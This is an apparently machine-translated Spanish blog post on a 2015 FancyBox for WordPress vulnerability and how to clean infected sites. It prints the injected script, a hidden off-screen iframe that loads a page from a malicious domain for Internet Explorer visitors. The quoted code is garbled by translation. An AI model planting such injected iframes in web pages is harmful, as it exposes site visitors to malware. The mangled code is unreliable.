A principios de esta semana una serie de sitios web y blogs WordPress, han recibido advertencias infectados con malware a través de Google Webmasters.
El problema al que Google Webmasters a que se refiere es la presencia de un código / guión iframe malware los sitios web de origen.
<Script> si (navigator.userAgent.match (/ MSIE / i)) document.write {( '<div style = "position: absolute; izquierda: -2000px; anchura: 2000px"> <iframe src = "http: / /203koko.eu/hjnfh/ipframe2.php "width =" 20 "height =" 30 "> </ iframe> </ div> '); } </ Script>
Parece que es una vulnerabilidad a pluginacervo FancyBox para WordPress que hasta ayer (05.02.2015) no había sido actualizado desde hace mucho tiempo.
La solución de este problema y desinfección de sitios virus con este malware, es relativamente simple.
1. Deshabilita el plugin de FancyBox.
2. Eliminar todos los archivos del complemento FancyBox del servidor (a través de FTP)
3. Instala la nueva versión del plugin (FancyBox 3.0.4)
FancyBox para WordPress 3.0.4
- Renombró la configuración afectada por el problema de seguridad mencionado en 3.0.3. Esto debería evitar que el código malicioso aparezca en los sitios donde se actualiza el complemento sin eliminar el código malicioso.
FancyBox para WordPress 3.0.3
- Se ha corregido un problema de seguridad.
Información de Malware:
TIPO: Iframe redirección
OBJETIVO: FancyBox WordPress
DOMINIO MALWARE: 203koko.eu
MALWARE URI: http://203koko.eu/hjnfh/ipframe2.php
MALWARE código crudo: <iframe src = "http://203koko.eu/hjnfh/ipframe2.php" width = altura "20" = "30"> </ iframe>
MALWARE GUIÓN: <script> si (/ / i) navigator.userAgent.match (MSIE) {document.write ('<div style = "position: absolute; left: -2000px; anchura: 2000px">
Eliminar el malware de tu sitio de WordPress.
